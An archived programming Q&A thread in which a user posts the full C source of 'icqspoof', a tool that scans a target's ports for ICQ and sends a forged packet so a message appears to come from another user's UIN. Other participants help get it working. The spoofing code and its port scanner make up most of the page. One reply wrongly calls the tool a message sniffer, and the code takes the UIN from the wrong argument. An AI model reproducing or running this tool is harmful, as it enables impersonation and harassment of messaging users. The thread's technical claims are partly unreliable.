Solved

Help!

Posted on 1998-04-09
11
269 Views
Last Modified: 2010-04-15
I founde this program, but I can't get it to work.
Can someone help me?????
I thin'k it's smoething wrong in the code.

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>

int main(argc, argv)
int argc;
char *argv[];
{
  struct sockaddr_in sin;
        int sock,i,x,y;
        unsigned long uin;
        int Port;

  char buffer[16];
  int connected = 1;
  typedef struct icq_prot {
  unsigned char magicNum[2];
  unsigned char UIN[4];
  unsigned char unknown[4];
  unsigned char unknown2[2];
  unsigned char length[2];
  unsigned char strng[256];
  } icq_prot;
  icq_prot sendMessage;
  unsigned long temp;
  unsigned char bigguy[1024];
  if (argc != 6)
    {
      fprintf(stderr,"Usage:  icqspoof ip SpoofedUIN message startport endport\n");

    exit(1);
  }
  Port = ScanPort(argv[1],atoi(argv[4]),atoi(argv[5]));
  if (Port == -1) {
                printf("No ICQ Port Found =(\n");
                return;
  }

  sendMessage.magicNum[0]=0x2e;
  sendMessage.magicNum[1]=0x0;
  sendMessage.unknown[0]=0x04;
  sendMessage.unknown[1]=0x01;
  sendMessage.unknown[2]=0x0F;
  sendMessage.unknown[3]=0x0;
  sendMessage.unknown2[0]=0x01;
  sendMessage.unknown2[1]=0x0;
  temp=atol(argv[3]);
  sendMessage.UIN[0]=temp & 0xFF;
  sendMessage.UIN[1]=(temp >> 8) & 0xFF;
  sendMessage.UIN[2]=(temp >> 16) & 0xFF;
  sendMessage.UIN[3]=0;
  strncpy(sendMessage.strng,argv[3],256);
  sendMessage.length[0]=strlen(sendMessage.strng)+1;
  sendMessage.length[1]=0;

  if (!(sock = socket(AF_INET, SOCK_STREAM, 0))) {
                        printf("Error: Unable to creat socket, Exiting.\n");
                        exit(1);
                }
  sin.sin_family = AF_INET;
                sin.sin_addr.s_addr = inet_addr(argv[1]);
                sin.sin_port = htons(Port);

   if (connect(sock, (struct sockaddr*)&sin,sizeof(sin))==-1) {
                        printf("Error Connecting to Socket\n");
                        return;
   }



  x=20;
  bigguy[0]=sendMessage.magicNum[0];
  bigguy[1]=sendMessage.magicNum[1];
  bigguy[2]=sendMessage.UIN[0];
  bigguy[3]=sendMessage.UIN[1];
  bigguy[4]=sendMessage.UIN[2];
  bigguy[5]=sendMessage.UIN[3];
  bigguy[6]=0x02;
  bigguy[7]=0x00;
  bigguy[8]=0xEE;
  bigguy[9]=0x07;
  bigguy[10]=0x00;
  bigguy[11]=0x00;
  bigguy[12]=sendMessage.UIN[0];
  bigguy[13]=sendMessage.UIN[1];
  bigguy[14]=sendMessage.UIN[2];
  bigguy[15]=sendMessage.UIN[3];
  bigguy[16]=0x01;
  bigguy[17]=0x00;
  bigguy[18]=sendMessage.length[0];
  bigguy[19]=sendMessage.length[1];
  for(i=0;i<sendMessage.length[0];i++)
  bigguy[x++]=sendMessage.strng[i];
  bigguy[x++]=0x82;
  bigguy[x++]=0xD7;
  bigguy[x++]=0xF3;
  bigguy[x++]=0x20;
  bigguy[x++]=0x82;
  bigguy[x++]=0xD7;
  bigguy[x++]=0xF3;
  bigguy[x++]=0x20;
  bigguy[x++]=0x09;
  bigguy[x++]=0x04;
  bigguy[x++]=0x00;
  bigguy[x++]=0x00;
  bigguy[x++]=0x04;
  bigguy[x++]=0x00;
  bigguy[x++]=0x00;
  bigguy[x++]=0x10;
  bigguy[x++]=0x01;
  bigguy[x++]=0xEB;
  bigguy[x++]=0xFF;
  bigguy[x++]=0xFF;
  bigguy[x++]=0xFF;
  bigguy[x++]=0x02;
  bigguy[x++]=0x00;
  bigguy[x++]=0x0A;
  bigguy[x++]=0x09;
  bigguy[x++]=0x00;

  write(sock,bigguy,x-1);
  printf("Done!\n");
  close(sock);
  return 0;
}

int ScanPort(char *ipaddr, int StartIP, int EndIP) {
        struct sockaddr_in sin;
        int sock,x,y;
        unsigned long uin;

        printf("Scanning Ports");
        for (x=StartIP;x<=EndIP;++x) {
                if (!(sock = socket(AF_INET, SOCK_STREAM, 0))) {
                        printf("Error: Unable to connect\n");
                        return -1;
                }
                sin.sin_family = AF_INET;
                sin.sin_addr.s_addr = inet_addr(ipaddr);
                sin.sin_port = htons(x);

                if (connect(sock, (struct sockaddr*)&sin,sizeof(sin))!=-1) {
                        close(sock);
                        printf("Port %d Open! Spoofing...\n",x);
                        fflush(stdout);
                        return x;
                }
                printf(".");
                fflush(stdout);
        }
        printf("\n");
        return -1;
}
0
Comment
Question by:chucken
  • 4
  • 4
  • 2
  • +1
11 Comments
 
LVL 6

Expert Comment

by:jpk041897
ID: 1258052
What platform/compiler is this code supposed to have been written for?

The use of main seems to indicate a DOS/UNIX plattform and the netinet\ ans arpa\ almost certanly indicate either a UNIX platform or the use of some spetial library.
0
 
LVL 4

Expert Comment

by:jtwine100697
ID: 1258053
  Kinda interesting that you want help on compiling a program that is designed to mess with ICQ... :P

-=- James.
0
 
LVL 1

Accepted Solution

by:
Talence earned 310 total points
ID: 1258054
I tried to compile this program on my RedHat 4.2 linux box:

# gcc -o icq icq.c
# ./icq
Usage: icqspoof ip SpoofedUIN message startport
   endport

So: doesn't seem like there is a problem in the code. If you
    use the same OS/distribution, this should compile cleanly.

What do you intend to uhm.. use it for, btw? ;-) Another btw:
it's lots of fun to experiment with these 'nasty programs', but
if you don't know what you're doing you may get into quite a
lot of trouble.
   



0
 

Author Comment

by:chucken
ID: 1258055
The problem is not that I can't compile it. I't doesn't work for me.

I intend to use it as a cgi-script whicha are sending me icq-messages from my homepage. Is there any better way to do that?)

Btw.
 
I compile it with gcc icq.c -o icq
An try to send a message to my self.
I start my icq on my other machine with ip X.Y.Z
and type

icq X.Y.Z CCCCC Hello 0 40000

And I don't get any icq message. Why?
0
 
LVL 6

Expert Comment

by:jpk041897
ID: 1258056
Mostly, I believe you don't get the message because the code appers to be a spoofer (aka sniffer). It seems to be designed to read other peoples messages, not sending messages to you.
0
What Security Threats Are You Missing?

Enhance your security with threat intelligence from the web. Get trending threat insights on hackers, exploits, and suspicious IP addresses delivered to your inbox with our free Cyber Daily.

 

Author Comment

by:chucken
ID: 1258057
Oh? Why this in the head of the file????? An why the message part in the Usage????

/* icqspoof.c -  This program sends a message to a given ICQ user and it
 * will appear to be from an arbitrary UIN. Loads of fun.
 *                                                                        
0
 
LVL 4

Expert Comment

by:jtwine100697
ID: 1258058
  "X.Y.Z" is an incomplete IP address...  It should have *4* octets...  Like "W.X.Y.Z"...  Also, "CCCCC" is an invalid UIN, you might need to use a numeric one...

-=- James.
0
 

Author Comment

by:chucken
ID: 1258059
Those Where exampels.  Instead of X.Y.Z I enterd my  ip-adress. And instead of CCCCCC I enterd my friends UIN just to test. I'm not so stupid.
0
 
LVL 4

Expert Comment

by:jtwine100697
ID: 1258060
  OK...  Try it with me...  My IP address is 204.237.1.4, and try ports 1206, and 1207.

   BTW: If you do not want others to think that you are "so stupid", provide explicit examples!

-=- James.
0
 

Author Comment

by:chucken
ID: 1258061
No ports found.... :-(
0
 
LVL 4

Expert Comment

by:jtwine100697
ID: 1258062
  Dunno what to tell you then...

-=- James.
0

Featured Post

Better Security Awareness With Threat Intelligence

See how one of the leading financial services organizations uses Recorded Future as part of a holistic threat intelligence program to promote security awareness and proactively and efficiently identify threats.

Join & Write a Comment

This tutorial is posted by Aaron Wojnowski, administrator at SDKExpert.net.  To view more iPhone tutorials, visit www.sdkexpert.net. This is a very simple tutorial on finding the user's current location easily. In this tutorial, you will learn ho…
Windows programmers of the C/C++ variety, how many of you realise that since Window 9x Microsoft has been lying to you about what constitutes Unicode (http://en.wikipedia.org/wiki/Unicode)? They will have you believe that Unicode requires you to use…
The goal of this video is to provide viewers with basic examples to understand how to use strings and some functions related to them in the C programming language.
The goal of this video is to provide viewers with basic examples to understand how to create, access, and change arrays in the C programming language.

762 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

20 Experts available now in Live!

Get 1:1 Help Now